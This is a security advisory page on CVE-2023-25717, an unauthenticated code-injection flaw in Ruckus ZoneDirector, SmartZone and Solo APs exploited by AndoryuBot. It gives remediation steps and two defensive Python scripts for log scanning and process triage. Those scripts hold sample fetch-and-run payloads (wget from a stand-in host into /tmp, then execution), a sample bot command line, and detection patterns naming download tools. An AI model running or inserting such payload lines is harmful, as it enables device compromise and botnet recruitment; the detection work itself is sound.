CVE-2023-25717 — Multiple Ruckus Wireless Products CSRF and RCE Vulnerability


Ruckus ZoneDirector/SmartZone/Solo APs: Web Services Flaw Enables Unauthenticated Remote Code Execution; AndoryuBot Exploitation; Fixed February 2023

What is Ruckus Wireless?

Ruckus Wireless (now part of CommScope) manufactures enterprise-grade Wi-Fi access points and wireless LAN management systems used in large-scale deployments across education, hospitality, healthcare, and enterprise environments. Ruckus ZoneDirector and SmartZone are wireless LAN controllers that manage hundreds or thousands of Ruckus access points from a central management plane. Solo APs (standalone access points without a controller) expose a direct management web interface. Wireless LAN infrastructure compromise provides an attacker with the ability to intercept wireless traffic, create rogue SSIDs, disable wireless access for users, and potentially pivot to the wired network management infrastructure. Enterprise wireless controllers are particularly sensitive targets as they have broad network visibility.

Overview

CVE-2023-25717 is a remote code execution vulnerability in the web services component of multiple Ruckus Wireless products: ZoneDirector, SmartZone, and Solo access points. On devices where that component is enabled, an unauthenticated attacker can achieve remote code execution, and the same weakness can be used for cross-site request forgery (CSRF) against the management interface. Ruckus patched it in February 2023 via Security Bulletin 315. The AndoryuBot malware campaign (a Mirai variant) was confirmed exploiting CVE-2023-25717 to compromise Ruckus access points and recruit them into its botnet, and CISA added the CVE to the KEV catalog in May 2023.

Affected Versions

Product                     Vulnerable                                   Fixed
Ruckus ZoneDirector         Multiple versions before the Feb 2023 patch  Per Security Bulletin 315
Ruckus SmartZone (SZ/vSZ)   Multiple versions before the Feb 2023 patch  Per Security Bulletin 315
Ruckus Solo APs (ZoneFlex)  Multiple firmware versions                   Per Security Bulletin 315

Administrators should consult Ruckus Security Bulletin 315 for specific affected and fixed firmware versions for each product line.

Technical Details

CWE-94 (Improper Control of Generation of Code, "Code Injection"). Ruckus wireless products optionally expose a web services component, an HTTP-accessible API intended for integration with third-party management systems. A flaw in that component lets an unauthenticated attacker send crafted HTTP requests that result in either:

  1. Remote code execution: Injecting commands or code that execute on the underlying Linux OS of the access point or controller with elevated privileges.
  2. CSRF (Cross-Site Request Forgery): Crafting requests that cause an authenticated administrator's browser to perform privileged actions against the management interface.

The RCE vector is what earned the CVSS 9.8 rating (AV:N/PR:N/UI:N) and drove the KEV addition: the attack requires only network reachability of the device's web services port, with no credentials. The result is OS command execution on the Ruckus device, which is enough to write botnet malware into the persistent flash filesystem so that it survives a reboot.
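To make the detection side of this concrete, here is an added example (not code from this page, from Ruckus, or from the researchers who reported the bug) that scans web-server access logs for requests whose decoded parameters carry shell command substitution, command chaining, or a fetch-and-run into scratch space, which is the shape an unauthenticated command-injection attempt against a management interface takes. The combined log format, the /admin/login and /admin/status paths, the parameter names, and the log lines themselves are constructed assumptions; point it at whatever the controller, AP, or fronting reverse proxy actually records.

```python
"""Flag HTTP requests to a management interface whose parameters carry
OS command-injection payloads of the kind CVE-2023-25717 enables.

Added example for this page, not Ruckus code. The combined access-log
format, the endpoint paths and parameter names below are assumptions.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Shell constructs that have no business in a login or API parameter.
INJECTION_PATTERNS = [
    re.compile(r"\$\("),       # $(...) command substitution
    re.compile(r"`"),          # backtick command substitution
    re.compile(r"[;|&]"),      # command chaining and pipes
    re.compile(r"\$\{IFS\}"),  # ${IFS} used to smuggle whitespace
]
# Dropper behaviour: fetch a payload with a stock tool into scratch space.
DROPPER_PATTERN = re.compile(r"\b(wget|curl|tftp|busybox)\b.*(/tmp|/var/tmp|/dev/shm)")

# Apache/nginx "combined" format; only GET query strings are visible here.
# POST bodies need a reverse proxy or WAF that logs request bodies.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample: two injection attempts from one source, two benign requests.
# The first payload decodes to  x$(wget http://198.51.100.9/a.sh -O /tmp/a.sh)
# and the third to             x;chmod +x /tmp/a.sh;/tmp/a.sh
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2023:03:14:07 +0000] "GET /admin/login?username=admin&password=x%24%28wget+http%3A%2F%2F198.51.100.9%2Fa.sh+-O+%2Ftmp%2Fa.sh%29 HTTP/1.1" 200 512
192.0.2.44 - - [10/May/2023:03:15:22 +0000] "POST /admin/login HTTP/1.1" 302 0
203.0.113.7 - - [10/May/2023:03:16:01 +0000] "GET /admin/login?username=admin&password=x%3Bchmod+%2Bx+%2Ftmp%2Fa.sh%3B%2Ftmp%2Fa.sh HTTP/1.1" 200 512
192.0.2.45 - - [10/May/2023:03:17:45 +0000] "GET /admin/status?ssid=Guest-WiFi HTTP/1.1" 200 2048
"""


def decoded_parameters(target):
    """Split a request target into its decoded path and {name: decoded value}."""
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return unquote(parts.path), params


def classify(target):
    """Return the reasons a request target looks like a command-injection attempt.

    Decoding happens first so that percent-encoded metacharacters are caught.
    """
    path, params = decoded_parameters(target)
    reasons = []
    for pat in INJECTION_PATTERNS:
        if pat.search(path):
            reasons.append(f"shell metacharacter {pat.pattern!r} in path")
            break
    for name, value in params.items():
        for pat in INJECTION_PATTERNS:
            if pat.search(value):
                reasons.append(f"shell metacharacter {pat.pattern!r} in parameter {name}")
                break
        if DROPPER_PATTERN.search(value):
            reasons.append(f"dropper-style fetch into scratch directory in parameter {name}")
    return reasons


def scan_log(text):
    """Parse combined-format access log text and return the flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; report these separately in production
        reasons = classify(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "target": m["target"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["status"], f["target"])
        for r in f["reasons"]:
            print("   ", r)
```

Decoding before matching matters: the raw log line contains `%24%28`, not `$(`, so a naive grep for metacharacters misses it. A 200 status on the login endpoint does not mean the injection failed; the page being served and the command running are independent, so treat any hit as a compromise until the device has been checked.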

Discovery

Reported to Ruckus (CommScope) by security researchers. Ruckus issued Security Bulletin 315 on February 7, 2023, ahead of the CVE publication date.

Exploitation Context

The AndoryuBot campaign, a Mirai-variant botnet, was documented exploiting CVE-2023-25717 to compromise internet-accessible Ruckus wireless access points and controllers. Compromised Ruckus APs are recruited into DDoS botnet infrastructure and used as proxies for other attack campaigns. Ruckus access points, like other enterprise IoT and network devices, often receive delayed firmware updates in operational environments where wireless disruption is considered unacceptable. Many Ruckus APs are deployed in hospitality and education settings where the management interface may be reachable from guest networks.

CISA's remediation note to "disconnect product if it is end-of-life" reflects that some Ruckus Solo AP models may not receive patches for older firmware lines — in those cases, retirement is the only option.

Remediation

  1. Apply Ruckus firmware updates per Security Bulletin 315 — update ZoneDirector, SmartZone (SZ/vSZ), and all managed access points to patched firmware versions.
  2. Disable the Ruckus web services component if it is not actively required for third-party integration — the vulnerability only affects devices where this component is enabled.
  3. Restrict management interface access for ZoneDirector and SmartZone to management VLANs only — controllers should not be reachable from guest or general user networks.
  4. For Solo APs that cannot be patched (EOL models): isolate them from internet-accessible network segments or replace with supported models.
  5. Review AP and controller logs for unexpected web service requests or unauthorized access attempts around and after February 2023.
  6. Inspect running processes on accessible APs for cryptominer or botnet malware (unexpected high-CPU processes, unknown executables in /tmp or persistent storage).
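Steps 5 and 6 can be worked offline on listings pulled from the device. The following added example (not from this page and not Ruckus tooling) triages an exported process listing and an `ls -l` of /tmp for the indicators above: executables running from scratch directories, processes pegging the CPU, and fetch-and-execute command lines. The column layout (PID USER %CPU COMMAND, as `ps -eo pid,user,pcpu,args` prints on a full procps system), the 50% CPU threshold, and both sample listings are constructed assumptions; BusyBox `ps` on an AP prints different columns, so adjust the line regex to match what you actually captured.

```python
"""Offline triage of a process listing and a /tmp listing exported from a
Ruckus AP or controller after a suspected CVE-2023-25717 compromise.

Added example for this page, not Ruckus tooling. Column layouts, the CPU
threshold and the sample listings are assumptions.
"""
import re

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CPU_THRESHOLD = 50.0  # percent; assumed, tune for the platform and its normal load
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp)\b")

# Assumed layout: PID USER %CPU COMMAND (procps `ps -eo pid,user,pcpu,args`).
PS_LINE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<cpu>\d+(?:\.\d+)?)\s+(?P<cmd>.+?)\s*$"
)
# `ls -l`: perms links owner group size month day time-or-year name
LS_LINE = re.compile(
    r"^(?P<perms>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)"
    r"\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

# Constructed sample listings: a hidden bot binary in /tmp pegging the CPU,
# and the dropper shell that fetched it, alongside normal AP daemons.
SAMPLE_PS = """\
  PID USER     %CPU COMMAND
    1 root      0.0 /sbin/init
  412 root      0.3 /usr/bin/hostapd -B /etc/hostapd.conf
  987 root      1.2 /usr/sbin/httpd -p 443
 1493 root     97.4 /tmp/.x86 203.0.113.50 6667
 1502 root      0.0 sh -c wget http://198.51.100.9/bins.sh -O /tmp/bins.sh; sh /tmp/bins.sh
"""

SAMPLE_LS = """\
total 24
-rwxr-xr-x    1 root     root        61440 May 10 03:16 .x86
-rw-r--r--    1 root     root          312 May 10 03:15 bins.sh
drwxr-xr-x    2 root     root         4096 May  9 12:00 ruckus_cache
-rw-------    1 root     root            0 May  9 12:00 httpd.pid
"""


def triage_processes(ps_text):
    """Return processes that match any of the remediation checklist's indicators."""
    findings = []
    for line in ps_text.splitlines():
        m = PS_LINE.match(line)
        if not m:
            continue  # header or unparsable line
        cmd = m["cmd"]
        exe = cmd.split()[0]
        reasons = []
        if exe.startswith(SCRATCH_DIRS):
            reasons.append("executable in scratch directory")
        if float(m["cpu"]) >= CPU_THRESHOLD:
            reasons.append(f"cpu {m['cpu']}% above threshold")
        if FETCH_TOOLS.search(cmd) and any(d in cmd for d in SCRATCH_DIRS):
            reasons.append("fetches into scratch directory")
        if reasons:
            findings.append({"pid": int(m["pid"]), "user": m["user"],
                             "cmd": cmd, "reasons": reasons})
    return findings


def triage_tmp_listing(ls_text):
    """Return regular files in an `ls -l` listing that have any execute bit set."""
    findings = []
    for line in ls_text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue  # "total N" line or unparsable entry
        perms = m["perms"]
        # Owner/group/other execute positions; s and t imply execute as well.
        executable = any(perms[i] in "xst" for i in (3, 6, 9))
        if perms[0] == "-" and executable:
            findings.append({"name": m["name"], "perms": perms, "size": int(m["size"])})
    return findings


if __name__ == "__main__":
    for p in triage_processes(SAMPLE_PS):
        print(f"pid {p['pid']} ({p['user']}): {p['cmd']}")
        for r in p["reasons"]:
            print("   ", r)
    for f in triage_tmp_listing(SAMPLE_LS):
        print(f"executable in /tmp: {f['name']} {f['perms']} {f['size']} bytes")
```

Capture the listings before rebooting or re-flashing: a bot that lives only in /tmp disappears on reboot, while one written to persistent storage (the case this page warns about) survives it, and the process listing is the quickest way to tell the two apart.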

Key Details

Property              Value
CVE ID                CVE-2023-25717
Vendor / Product      Ruckus Wireless, multiple products
NVD Published         2023-02-13
NVD Last Modified     2025-11-03
CVSS 3.1 Score        9.8
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity              CRITICAL
CWE                   CWE-94
CISA KEV Added        2023-05-12
CISA KEV Deadline     2023-06-02
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector:        Network
Attack Complexity:    Low
Privileges Required:  None
User Interaction:     None
Scope:                Unchanged
Confidentiality:      High
Integrity:            High
Availability:         High

Required Action

CISA BOD 22-01 Deadline: 2023-06-02. Apply updates per vendor instructions or disconnect product if it is end-of-life.

Timeline

Date        Event
2023-02-07  Ruckus releases Security Bulletin 315 patching CVE-2023-25717 across ZoneDirector, SmartZone, and Solo AP platforms
2023-02-13  CVE-2023-25717 published
2023-05-12  CISA adds CVE-2023-25717 to the Known Exploited Vulnerabilities catalog; AndoryuBot exploitation of vulnerable Ruckus APs confirmed
2023-06-02  CISA BOD 22-01 remediation deadline

References

Resource                                          Type
Ruckus Security Bulletin 315 (CVE-2023-25717)     Vendor Advisory
NVD entry for CVE-2023-25717                      Vulnerability Database
CISA KEV Catalog Entry                            US Government